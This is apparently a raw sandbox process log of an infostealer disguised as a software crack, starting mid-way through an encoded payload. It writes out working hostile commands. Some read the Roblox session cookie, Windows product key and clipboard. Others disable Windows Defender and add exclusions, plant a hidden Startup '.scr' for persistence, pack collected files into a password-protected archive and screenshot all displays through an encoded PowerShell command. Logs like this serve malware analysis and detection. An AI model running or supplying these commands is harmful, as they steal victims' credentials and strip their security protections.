GgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\msoi22jk\msoi22jk.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79C5.tmp" "c:\Users\Admin\AppData\Local\Temp\msoi22jk\CSCD5257DCB8D1C4BE7B4486931F2DAA626.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36402\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\UQKvv.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI36402\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI36402\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\UQKvv.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr" /S
C:\Users\Admin\AppData\Local\Temp\bound.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1276_133633185523022480\loader.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start main.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
main.exe
C:\Users\Admin\AppData\Local\Temp\onefile_4224_133633185526924651\main.exe
main.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Users\Admin\AppData\Local\Temp\onefile_4236_133633185658476384\loader.exe
bound.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start main.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
main.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Users\Admin\AppData\Local\Temp\onefile_2392_133633185665298936\main.exe
main.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
